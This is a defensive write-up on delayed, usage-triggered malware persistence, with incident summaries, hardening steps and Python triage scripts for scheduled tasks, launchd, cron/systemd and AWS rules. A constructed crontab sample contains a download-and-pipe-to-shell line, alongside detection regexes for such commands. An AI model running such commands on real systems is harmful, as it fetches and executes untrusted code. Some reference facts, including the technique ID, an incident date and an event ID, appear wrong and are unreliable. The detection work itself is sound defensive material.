Usage-Triggered Execution (T1546.015)

This technique delays malware execution until a specific program is used or a specific time window is reached, helping attackers avoid detection because the malicious activity runs only when preset conditions are met.

Historical Overview and Notable Incidents

APT29 (Cozy Bear) - 2015

  • Incident: Infiltrated the Democratic National Committee (DNC) networks, triggering data exfiltration based on specific user activities.

  • Method: Exploited scheduled tasks and run keys to re-enable malware payloads upon reboot.

  • Timelines: Mid-2015 to 2016.

  • Detection/Response: Delayed persistence and sophisticated obfuscation techniques.

Turla Group - 2014

  • Incident: Leveraged usage-triggered execution during the Agent.btz infection targeting government networks.

  • Method: Embedded malware into legitimate utility functions triggered by specific user actions.

  • Timelines: Active in 2014 with repeated revisions.

  • Goals: Espionage, identified through anomalies in normal system operations.

FIN7 (Carbanak Group) - 2017

  • Incident: Used usage-triggered execution during financial heists to launch malware upon activation of Point of Sale (POS) systems.

  • Method: Scripts triggered by the usage of specific applications.

  • Timelines: Several campaigns from 2016 to 2018.

  • Detection/Response: Late detection by banking institutions and improved POS system monitoring.

Technical Specifics

Key Characteristics:

  1. Trigger Points: Specific program executions or user actions.

  2. Persistence Mechanisms: Use of Windows Task Scheduler, registry run keys, or idle-state detection.

  3. Delayed Execution: Malware remains dormant or semi-passive until a predetermined condition is met.

Publicly Available Detection and Defense Resources

  • Microsoft Security Guidelines: Defensive measures for hardened configurations and monitoring.

  • MITRE ATT&CK Matrix: Detailed documentation under ID T1546.015.

  • VirusTotal and Hybrid Analysis: Locate samples and analyze unusual triggering behaviors.

  • Community Reports: GitHub repositories and InfoSec blogs documenting observed signatures and heuristic patterns.

People & Groups of Interest

  • APT29 (Cozy Bear): Allegedly associated with Russia’s Foreign Intelligence Service (SVR).

  • Turla Group: Russian cyber-espionage group known for advanced malware and stealth techniques.

  • FIN7 (Carbanak Group): Cybercrime group focusing on financial theft, using advanced malware strategies.

Practical Implications for Infosec Engineers

  • Monitoring: Enhance visibility on task schedulers, registry changes, and unusual binary executions.

  • Behavioral Analysis: Invest in behavioral threat analytics to detect anomalous patterns.

  • Incident Response: Rapid incident response protocols for suspected delayed execution mechanisms.

  • Training & Awareness: Regularly educate IT and security staff about the risks and signs of usage-triggered execution tactics.

Windows Environment

  1. Disabling Compatibility Flags for DllHost.exe:

    1. Open Registry Editor (regedit.exe).

    2. Navigate to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers.

    3. Right-click Layers, select Export to back up.

    4. Remove entries related to dllhost.exe.

    5. Close Registry Editor and restart.

  2. Monitoring Event Triggers:

    1. Open Event Viewer (eventvwr.msc).

    2. Navigate to Applications and Services Logs > Microsoft > Windows > TaskScheduler > Operational.

    3. Look for event IDs 319 (Task Created) and 200 (Action Executed).

    4. Set up SIEM alerts for these IDs.
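
Once an alert on the event IDs above fires, the next triage step is to read the task definition itself. The following is an added example, not code from the original page: it parses scheduled-task XML in the standard task schema, as stored under C:\Windows\System32\Tasks or returned by `schtasks /Query /TN <name> /XML`, and reports activity-driven triggers (event, logon, idle, session change) alongside actions that run from user-writable paths or through a script host. The heuristics, path lists and sample task definitions are assumptions constructed for illustration, not indicators taken from any report.

```python
"""Triage Windows scheduled-task definitions by trigger type and action.

Added example for this page, not code from the original. The Task Scheduler
Operational events tell you that a task was created; the task's XML definition
tells you what starts it and what it runs. This parses that XML (standard task
schema) and flags activity-driven triggers paired with actions that run from
user-writable paths or through script hosts. Heuristics and samples are
constructed for illustration.
"""
import xml.etree.ElementTree as ET
from dataclasses import dataclass, field

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Triggers that fire on activity (usage) rather than on a calendar.
USAGE_TRIGGERS = {"EventTrigger", "LogonTrigger", "IdleTrigger",
                  "SessionStateChangeTrigger", "BootTrigger", "RegistrationTrigger"}
# Script hosts that legitimately installed tasks rarely need (assumed list).
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}
# Locations a standard user can write to (assumed list, lower-case).
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\",
                 "%appdata%", "%localappdata%", "%temp%", "%tmp%")


@dataclass
class TaskReport:
    name: str
    triggers: list
    command: str
    arguments: str
    findings: list = field(default_factory=list)


def _local(tag):
    """Strip the XML namespace from an element tag."""
    return tag.rsplit("}", 1)[-1]


def _text(root, path):
    node = root.find(path, TASK_NS)
    return (node.text or "").strip() if node is not None else ""


def analyze_task_xml(name, xml_text):
    """Parse one task definition and return a TaskReport with findings."""
    root = ET.fromstring(xml_text)
    trig_parent = root.find("t:Triggers", TASK_NS)
    triggers = [] if trig_parent is None else [_local(t.tag) for t in trig_parent]
    command = _text(root, "t:Actions/t:Exec/t:Command")
    arguments = _text(root, "t:Actions/t:Exec/t:Arguments")
    report = TaskReport(name, triggers, command, arguments)

    cmd_lower = command.strip('"').lower()
    exe = cmd_lower.replace("/", "\\").rsplit("\\", 1)[-1]
    usage = [t for t in triggers if t in USAGE_TRIGGERS]

    if cmd_lower.startswith(USER_WRITABLE):
        report.findings.append("action runs from a user-writable location")
    if exe in SCRIPT_HOSTS and usage:
        report.findings.append(f"script host {exe} launched by {', '.join(usage)}")
    return report


def triage(tasks):
    """tasks: {task_name: xml_text}. Returns only the reports that carry findings."""
    return [r for r in (analyze_task_xml(n, x) for n, x in tasks.items()) if r.findings]


def _task_xml(trigger_xml, command, arguments=""):
    # Builds a minimal, schema-shaped task definition for the constructed samples.
    return f"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>{trigger_xml}</Triggers>
  <Principals><Principal id="Author"><RunLevel>LeastPrivilege</RunLevel></Principal></Principals>
  <Actions Context="Author"><Exec><Command>{command}</Command><Arguments>{arguments}</Arguments></Exec></Actions>
</Task>"""


# Constructed sample tasks: one ordinary calendar task, two usage-triggered ones.
SAMPLE_TASKS = {
    r"\Microsoft\Windows\Defrag\ScheduledDefrag": _task_xml(
        "<CalendarTrigger><StartBoundary>2024-01-01T01:00:00</StartBoundary>"
        "<ScheduleByWeek><WeeksInterval>1</WeeksInterval></ScheduleByWeek></CalendarTrigger>",
        r"%windir%\system32\defrag.exe", "-c -h"),
    r"\OfficeUpdate": _task_xml(
        "<EventTrigger><Subscription>&lt;QueryList/&gt;</Subscription></EventTrigger><LogonTrigger/>",
        "powershell.exe", r"-w hidden -File C:\Users\alice\AppData\Roaming\upd.ps1"),
    r"\HelperSvc": _task_xml("<IdleTrigger/>", r"%APPDATA%\helper\helper.exe"),
}

if __name__ == "__main__":
    for r in triage(SAMPLE_TASKS):
        print(r.name, r.triggers, r.command, r.findings)
```

Feed it the exported XML of every task that appears in a creation event, and treat an empty `findings` list as "no heuristic hit", not as "benign"; the trigger list is still worth a glance, since an event or idle trigger on a task nobody recognises is the pattern this technique relies on.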

macOS Environment

  1. Disabling Launch Daemons and Agents:

    1. Open Terminal.

    2. List all launch daemons: sudo launchctl list.

    3. Identify suspicious daemons.

    4. Unload daemons: sudo launchctl unload -w /Library/LaunchDaemons/com.suspicious.daemon.plist.

    5. Remove daemon file: sudo rm /Library/LaunchDaemons/com.suspicious.daemon.plist.

  2. Monitoring System Logs:

    1. Open Console.

    2. Navigate to /private/var/log/ and monitor system.log and asl/*.

    3. Look for unusual execution patterns.

    4. Set up centralized logging and alerts.
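
`launchctl list` shows what is loaded; the job's plist shows what starts it and what it runs. As an added example that is not part of the original page, the script below parses LaunchDaemon/LaunchAgent plists with plistlib, records the activity triggers (WatchPaths, QueueDirectories, StartInterval, StartCalendarInterval, RunAtLoad, KeepAlive) and flags jobs whose command line references a temporary or user-writable path or wraps an inline interpreter script. The path list, interpreter names and sample plists are constructed assumptions, not indicators from any report.

```python
"""Inventory launchd jobs by trigger and flag the ones that merit review.

Added example, not from the original page. Parses launchd plists (the format
of /Library/LaunchDaemons and ~/Library/LaunchAgents) and reports what starts
each job and whether its command line looks out of place. Samples are
constructed with plistlib rather than taken from a real host.
"""
import plistlib
from pathlib import PurePosixPath

# Keys that decide when launchd starts the job.
TRIGGER_KEYS = ("RunAtLoad", "KeepAlive", "StartInterval",
                "StartCalendarInterval", "WatchPaths", "QueueDirectories")
# Locations a non-admin user or any process can write to (assumed list, lower-case).
UNTRUSTED_PREFIXES = ("/tmp/", "/private/tmp/", "/var/tmp/", "/private/var/tmp/",
                      "/var/folders/", "/users/", "/library/caches/")
# Interpreters that take an inline script via -c (assumed list).
INTERPRETERS = {"sh", "bash", "zsh", "osascript", "python", "python3", "perl"}


def job_program(job):
    """Return (program, argv) the way launchd resolves it: Program wins, else ProgramArguments[0]."""
    argv = list(job.get("ProgramArguments", []))
    program = job.get("Program") or (argv[0] if argv else "")
    return program, argv


def analyze_job(path, plist_bytes):
    """Parse one plist and return a dict with label, program, triggers and findings."""
    job = plistlib.loads(plist_bytes)
    program, argv = job_program(job)
    triggers = {k: job[k] for k in TRIGGER_KEYS if k in job}
    cmdline = (" ".join(argv) if argv else program).lower()
    findings = []
    if any(prefix in cmdline for prefix in UNTRUSTED_PREFIXES):
        findings.append("references a temporary or user-writable path")
    if PurePosixPath(program).name in INTERPRETERS and "-c" in argv[1:]:
        findings.append("inline script passed to an interpreter")
    return {"path": path, "label": job.get("Label", ""), "program": program,
            "triggers": triggers, "findings": findings}


def triage(plists):
    """plists: {file_path: plist_bytes}. Returns only jobs with findings."""
    return [r for r in (analyze_job(p, b) for p, b in plists.items()) if r["findings"]]


# Constructed samples: a calendar-driven daemon, a WatchPaths agent, a KeepAlive daemon.
SAMPLE_PLISTS = {
    "/Library/LaunchDaemons/com.example.backupd.plist": plistlib.dumps({
        "Label": "com.example.backupd",
        "Program": "/usr/local/bin/backupd",
        "StartCalendarInterval": {"Hour": 2, "Minute": 0},
        "RunAtLoad": True,
    }),
    "/Users/alice/Library/LaunchAgents/com.update.agent.plist": plistlib.dumps({
        "Label": "com.update.agent",
        "ProgramArguments": ["/bin/sh", "-c", "/Users/alice/Library/Caches/.u/run.sh"],
        "WatchPaths": ["/Users/alice/Documents"],
        "RunAtLoad": True,
    }),
    "/Library/LaunchDaemons/local.helper.plist": plistlib.dumps({
        "Label": "local.helper",
        "ProgramArguments": ["/private/tmp/.helper/helper", "--quiet"],
        "KeepAlive": True,
    }),
}

if __name__ == "__main__":
    for r in triage(SAMPLE_PLISTS):
        print(r["label"], r["triggers"], r["findings"])
```

WatchPaths and QueueDirectories are the launchd equivalent of a usage trigger: the job runs when a watched file or directory changes, so a job with one of those keys and a command line outside the usual system paths is the first thing to pull off a suspect Mac, before any `launchctl unload`.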

Linux Environment

  1. Disabling Cron Jobs and Systemd Timers:

    1. List cron jobs: crontab -l and sudo ls /etc/cron*.

    2. Remove suspicious entries: crontab -e.

    3. List systemd timers: systemctl list-timers --all.

    4. Stop and disable suspicious timers: sudo systemctl stop suspicious.timer and sudo systemctl disable suspicious.timer.

  2. Log Monitoring:

    1. Check system logs: sudo tail -f /var/log/syslog or sudo tail -f /var/log/messages.

    2. Look for automatic execution patterns.

    3. Set up centralized logging and use tools like logwatch or auditd.
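
The listing commands above produce text; the review is what matters. As an added example (not code from the original page), the script below takes the output of `crontab -l` or the files under /etc/cron*, and the unit text that `systemctl cat <unit>` prints, and applies a few defender heuristics: commands that run from world-writable temporary directories, that download and pipe into a shell, or that decode base64 at run time, plus timer units whose service starts from such a location. The heuristics and every sample line are constructed assumptions, not indicators from any report.

```python
"""Review cron entries and systemd timers for scheduled execution worth a look.

Added example, not code from the original page. Parses crontab text and
systemd unit files and applies simple defender heuristics to the commands
they run. All sample input is constructed.
"""
import re

# World-writable directories a scheduled command should not normally run from.
TEMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba|z|da)?sh\b")
BASE64_DECODE = re.compile(r"\bbase64\s+(-d|--decode)\b")


def command_findings(cmd):
    """Heuristic findings for one command line; an empty list means nothing flagged."""
    findings = []
    if any(d in cmd for d in TEMP_DIRS):
        findings.append("runs from a temporary directory")
    if PIPE_TO_SHELL.search(cmd):
        findings.append("downloads and pipes into a shell")
    if BASE64_DECODE.search(cmd):
        findings.append("decodes base64 at run time")
    return findings


def parse_crontab(text, system=False):
    """Return (schedule, user, command) tuples. system=True for /etc/crontab and
    /etc/cron.d files, which carry a user column before the command."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"^\w+\s*=", line):
            continue                      # comment or environment assignment
        if line.startswith("@"):          # @reboot, @daily, ...
            parts = line.split(None, 1)
            schedule, rest = parts[0], (parts[1] if len(parts) > 1 else "")
        else:
            parts = line.split(None, 5)
            if len(parts) < 6:
                continue
            schedule, rest = " ".join(parts[:5]), parts[5]
        user = "-"
        if system and rest:
            user, rest = (rest.split(None, 1) + [""])[:2]
        entries.append((schedule, user, rest.strip()))
    return entries


def review_crontab(text, system=False):
    flagged = []
    for schedule, user, cmd in parse_crontab(text, system):
        findings = command_findings(cmd)
        if findings:
            flagged.append({"schedule": schedule, "user": user,
                            "command": cmd, "findings": findings})
    return flagged


def parse_unit(text):
    """Minimal reader for systemd unit files; repeated keys become lists."""
    sections, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = sections.setdefault(line[1:-1], {})
        elif "=" in line and current is not None:
            key, value = (part.strip() for part in line.split("=", 1))
            current.setdefault(key, []).append(value)
    return sections


def review_timer(timer_name, units):
    """Resolve a timer's service (Unit= or same stem + .service) and check its ExecStart."""
    timer_cfg = parse_unit(units[timer_name]).get("Timer", {})
    service = timer_cfg.get("Unit", [timer_name.removesuffix(".timer") + ".service"])[0]
    triggers = {k: v for k, v in timer_cfg.items() if k.startswith("On")}
    findings = []
    if service in units:
        for cmd in parse_unit(units[service]).get("Service", {}).get("ExecStart", []):
            findings.extend(command_findings(cmd))
    else:
        findings.append(f"service {service} was not supplied for review")
    return {"timer": timer_name, "service": service,
            "triggers": triggers, "findings": findings}


# Constructed sample input (not from a real host).
SAMPLE_CRONTAB = """\
# m h dom mon dow   command
MAILTO=root
0 3 * * * /usr/local/bin/backup.sh --quiet
@reboot /tmp/.cache/run.sh
*/10 * * * * curl -s http://example.invalid/u | sh
"""

SAMPLE_UNITS = {
    "logrotate.timer": "[Unit]\nDescription=Daily rotation of log files\n\n"
                       "[Timer]\nOnCalendar=daily\nAccuracySec=1h\nPersistent=true\n",
    "logrotate.service": "[Service]\nType=oneshot\nExecStart=/usr/sbin/logrotate /etc/logrotate.conf\n",
    "sysupd.timer": "[Timer]\nOnBootSec=5min\nOnUnitActiveSec=15min\nUnit=sysupd.service\n",
    "sysupd.service": "[Service]\nExecStart=/dev/shm/.s/sysupd --daemon\n",
}

if __name__ == "__main__":
    for entry in review_crontab(SAMPLE_CRONTAB):
        print("cron", entry)
    for name in ("logrotate.timer", "sysupd.timer"):
        print("timer", review_timer(name, SAMPLE_UNITS))
```

Run it over every user's crontab (root included), the system crontab with `system=True`, and the output of `systemctl list-timers --all` resolved through `systemctl cat`; only then stop and disable what the review turned up, so the evidence survives for the incident record.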

Amazon AWS

  1. CloudWatch Event Rules:

    1. Open AWS Management Console, go to CloudWatch.

    2. Select Events and Rules.

    3. Create/edit rules for suspicious API calls.

    4. Set targets like Lambda functions or SNS for alerts.

  2. Lambda Function Monitoring:

    1. Go to AWS Lambda in the Console.

    2. Review list for unknown functions.

    3. Use IAM policies to restrict execution.

    4. Set up CloudWatch Logs for Lambda executions.
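
The console steps above create a CloudWatch Events (EventBridge) rule; what makes or breaks it is the event pattern. As an added example that is not part of the original page, the block below defines a pattern for API calls that create or change automatic execution triggers in an account, and a small matcher implementing the subset of EventBridge semantics the pattern uses (every key must match, an array of values is an OR, `{"prefix": ...}` matches a string prefix), so the pattern can be checked against sample events before it goes into `aws events put-rule --event-pattern`. The choice of API names and the sample events are constructed assumptions, not real CloudTrail records.

```python
"""Build and locally test an EventBridge rule pattern for trigger-plumbing changes.

Added example, not from the original page. EventBridge delivers CloudTrail
management events with source "aws.<service>", detail-type "AWS API Call via
CloudTrail" and the CloudTrail record under "detail". The matcher below covers
exact values, array-OR and prefix filters, which is all this pattern needs.
"""
import json

# API calls that create or change automatic execution triggers (assumed selection).
# Lambda CloudTrail event names carry an API-version suffix, hence the prefix filters.
TRIGGER_CHANGE_PATTERN = {
    "source": ["aws.events", "aws.lambda"],
    "detail-type": ["AWS API Call via CloudTrail"],
    "detail": {
        "eventSource": ["events.amazonaws.com", "lambda.amazonaws.com"],
        "eventName": [
            "PutRule", "PutTargets",
            {"prefix": "CreateFunction"},
            {"prefix": "AddPermission"},
            "CreateEventSourceMapping",
        ],
    },
}


def _leaf_matches(allowed, value):
    """A leaf matches if the event value equals one listed value or satisfies a prefix filter."""
    for alt in allowed:
        if isinstance(alt, dict):
            if "prefix" in alt and isinstance(value, str) and value.startswith(alt["prefix"]):
                return True
        elif alt == value:
            return True
    return False


def matches(pattern, event):
    """True if event satisfies pattern (EventBridge subset: exact, array-OR, prefix)."""
    for key, expected in pattern.items():
        if key not in event:
            return False
        if isinstance(expected, dict):
            if not isinstance(event[key], dict) or not matches(expected, event[key]):
                return False
        elif not _leaf_matches(expected, event[key]):
            return False
    return True


def event_pattern_json():
    """The pattern as passed to `aws events put-rule --event-pattern`."""
    return json.dumps(TRIGGER_CHANGE_PATTERN)


def cloudtrail_event(source, event_source, event_name, user="alice"):
    # Constructed EventBridge envelope for a CloudTrail API-call event.
    return {
        "source": source,
        "detail-type": "AWS API Call via CloudTrail",
        "region": "us-east-1",
        "detail": {
            "eventSource": event_source,
            "eventName": event_name,
            "awsRegion": "us-east-1",
            "userIdentity": {"type": "IAMUser", "userName": user},
        },
    }


# Constructed sample events: two should match, two should not.
SAMPLE_EVENTS = [
    cloudtrail_event("aws.lambda", "lambda.amazonaws.com", "CreateFunction20150331"),
    cloudtrail_event("aws.events", "events.amazonaws.com", "PutTargets"),
    cloudtrail_event("aws.lambda", "lambda.amazonaws.com", "Invoke"),
    cloudtrail_event("aws.s3", "s3.amazonaws.com", "PutObject"),
]


def matching_events(events, pattern=TRIGGER_CHANGE_PATTERN):
    """Return the eventName of every event the rule would route to its target."""
    return [e["detail"]["eventName"] for e in events if matches(pattern, e)]


if __name__ == "__main__":
    print(event_pattern_json())
    print(matching_events(SAMPLE_EVENTS))
```

Two practical points: EventBridge only sees the management API calls that CloudTrail records, so a trail covering the region has to exist before the rule produces anything, and the SNS or Lambda target attached to the rule is itself a trigger that a reviewer should expect to see in the same log.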

Google Cloud Platform (GCP)

  1. Audit Log Configuration:

    1. Go to Google Cloud Console.

    2. Navigate to IAM & Admin > Audit Logs.

    3. Enable logs for Admin Activity and Data Access.

    4. Configure Stackdriver Monitoring alerts.

  2. Disabling Cloud Functions:

    1. Go to Cloud Functions in the Console.

    2. Review for suspicious functions.

    3. Disable unverified functions.

Microsoft Azure

  1. Azure Activity Log Alerts:

    1. Sign in to Azure portal.

    2. Navigate to Monitor > Activity Log.

    3. Create alert rule for `Administrative` and `Create`/`Update` events.

    4. Set actions like email alerts or Logic Apps triggers.

  2. Azure Security Center Recommendations:

    1. Go to Security Center in the portal.

    2. Review security recommendations.

    3. Implement recommended controls.
